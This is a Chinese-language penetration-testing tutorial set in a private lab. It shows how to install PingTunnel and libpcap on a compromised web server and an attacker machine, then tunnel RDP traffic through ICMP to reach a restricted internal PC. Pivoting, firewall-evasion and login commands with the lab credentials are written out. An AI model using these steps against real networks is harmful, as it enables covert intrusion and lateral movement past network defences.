利用ICMP隧道加密隐藏通信Shell

PingTunnel

PingTunnel也是一款常用的ICMP隧道工具,可以跨平台使用。为了避免隧道被滥用,它可以为隧道设置一个密码。

下载地址:http://freshmeat.sourceforge.net/projects/ptunnel/

ICMP隧道反弹Shell

有这么一个场景:

图片

如上图所示:我们通过渗透拿到了网络边界Web服务器(192.168.217.135),发现他内网有一台PC(192.168.217.132)并且开放了3389远程桌面,我们有密码(user:saul,pass:saul),但是通过跳板(192.168.217.135)的RDP连接不了内网PC的机子(做了限制),最后我们发现我们的跳板可以和内网PC能够Ping通,那么我们就可以通过ICMP协议隧道来进行远程桌面登陆

通过ICMP协议隧道来进行远程桌面登陆

一:首先需要建立ICMP隧道的两台机器(Hacker、跳板)上安装PingTunnel工具,然后配置编译。

1
2
进行配置编译
make && make install

图片

如果遇到以上情况:‘缺少pcap.h’,那么需要安装libpcap(数据包捕获函数库)。

1
2
3
4
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure

图片

如果中途出现 ‘yacc’ 包错误那么安装byacc包就可以了:

1
sudo apt-get install -y byacc

之后重新运行:

1
2
3
./configure
make
sudo make install

图片

图片

之后输入命令:

1
man pcap

图片

出现以上就说明环境安装好了!最后再编译PingTunnel工具:

1
make && make install

图片

二:在Web服务器跳板192.168.217.135)中输入命令,运行PingTunnel工具:

1
sudo ptunnel -x saul[密码]

图片

三:在Hacker攻击者(192.168.217.129)中输入以下命令:

1
ptunnel -p 192.168.217.135(跳板ip) -lp 1080 -da 192.168.217.132(内网PC) -dp 3389 -x saul

图片

命令解释

1
2
3
4
5
-x:指定ICMP隧道连接的密码
-lp:指定要监听的本地TCP端口
-da:指定要转发的目标机器的IP地址
-dp:指定要转发目标机器的TCP端口
-p:指定ICMP隧道另一段的机器IP地址

上面的命令的意思就是:在访问攻击者的机器Hacker192.168.217.129)的1080端口时,会吧内网PC192.168.217.132)的3389端口数据封装在ICMP隧道里,以Web服务器192.168.217.135)为ICMP隧道跳板进行传输。

最后,在本地访问Hacker192.168.217.129)的1080端口,可以发现已经可以和内网PC192.168.217.132)的3389进行连接了:

1
rdesktop -g 1440x900 -u saul -p saul 127.0.0.1:1080

图片